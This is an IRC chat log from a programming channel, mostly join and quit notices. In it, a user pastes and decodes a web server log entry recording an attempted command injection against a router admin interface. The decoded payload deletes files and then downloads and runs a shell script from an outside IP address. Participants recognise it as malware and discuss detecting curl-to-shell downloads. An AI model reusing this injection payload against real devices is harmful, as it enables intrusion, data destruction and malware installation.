code logs -> 2024 -> Sun, 10 Mar 2024< code.20240309.log - code.20240311.log >
--- Log opened Sun Mar 10 00:00:03 2024
00:11 Emmy [Emmy@Nightstar-qo29c7.fixed.kpn.net] has quit [Ping timeout: 121 seconds]
00:19 Pinkhair [Pink@Nightstar-65hglq.sub-75-236-47.myvzw.com] has quit [Connection closed]
01:01 Vornicus [Vorn@Nightstar-ivektl.res.spectrum.com] has joined #code
01:01 mode/#code [+qo Vornicus Vornicus] by ChanServ
02:16 Kizor [Kizor@Nightstar-nfsqa7.yok.fi] has quit [[NS] Quit: ]
02:31 Degi [Degi@Nightstar-73et2p.pool.telefonica.de] has quit [Ping timeout: 121 seconds]
02:44 Degi [Degi@Nightstar-bhbqg3.pool.telefonica.de] has joined #code
02:54 NSGuest10889 [Kizor@Nightstar-nfsqa7.yok.fi] has joined #code
02:58 NSGuest10889 is now known as Kizor
03:54 Pink [Pink@Nightstar-65hglq.sub-75-236-47.myvzw.com] has joined #code
04:53 Vornicus [Vorn@Nightstar-ivektl.res.spectrum.com] has quit [Connection closed]
06:22 bluefoxx [fuzzylombax@Nightstar-1o5.10a.180.108.IP] has quit [Ping timeout: 121 seconds]
06:39 bluefoxx [fuzzylombax@Nightstar-1o5.10a.180.108.IP] has joined #code
06:52
<&[R]>
<[R]> 80.94.92.60 - - [09/Mar/2024:23:32:58 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
06:52
<&[R]>
<[R]> HMMMMMM
06:52
<&[R]>
<[R]> 'rm -rf *; cd /tmp; wget http://94.156.8.244/tenda.sh; chmod 777 tenda.sh; ./tenda.sh'
06:52
<&[R]>
<[R]> That's really rude
06:55
<&McMartin>
I wonder if that's one of the remarkable ones that behaves differently when piped straight from curl into sh instead of into an intermediate file. I seem to recall there's a way to distinguish at download time.
06:56
<&[R]>
No change when piped into cat or bat at least
06:58
<&[R]>
https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-bash-server-side/ <-- bad cert, but looks like a good writeup (might be the one you meant) about that
06:59
<&[R]>
Tried the sleep/cat thing, no difference in output
06:59
<&[R]>
It's fucking malware though :p
10:39 Emmy [Emmy@Nightstar-qo29c7.fixed.kpn.net] has joined #code
11:40 Mahal [sid171286@Nightstar-e2nmdb.irccloud.com] has quit [[NS] Quit: Connection closed for inactivity]
13:56 Vornicus [Vorn@Nightstar-ivektl.res.spectrum.com] has joined #code
13:56 mode/#code [+qo Vornicus Vornicus] by ChanServ
17:32 Vornicus [Vorn@Nightstar-ivektl.res.spectrum.com] has quit [Connection closed]
17:33 Kizor [Kizor@Nightstar-nfsqa7.yok.fi] has quit [[NS] Quit: ]
18:37 bluefoxx [fuzzylombax@Nightstar-1o5.10a.180.108.IP] has quit [[NS] Quit: Reconnecting]
18:37 bluefoxx [fuzzylombax@Nightstar-1o5.10a.180.108.IP] has joined #code
19:07 NSGuest37109 [Kizor@Nightstar-nfsqa7.yok.fi] has joined #code
21:48 Vornicus [Vorn@Nightstar-ivektl.res.spectrum.com] has joined #code
21:48 mode/#code [+qo Vornicus Vornicus] by ChanServ
22:18 NSGuest37109 is now known as Kizor
23:16 gnolam [lenin@Nightstar-kqana5.cust.bahnhof.se] has quit [Ping timeout: 121 seconds]
23:51 Emmy [Emmy@Nightstar-qo29c7.fixed.kpn.net] has quit [Ping timeout: 121 seconds]
--- Log closed Mon Mar 11 00:00:04 2024
code logs -> 2024 -> Sun, 10 Mar 2024< code.20240309.log - code.20240311.log >

[ Latest log file ]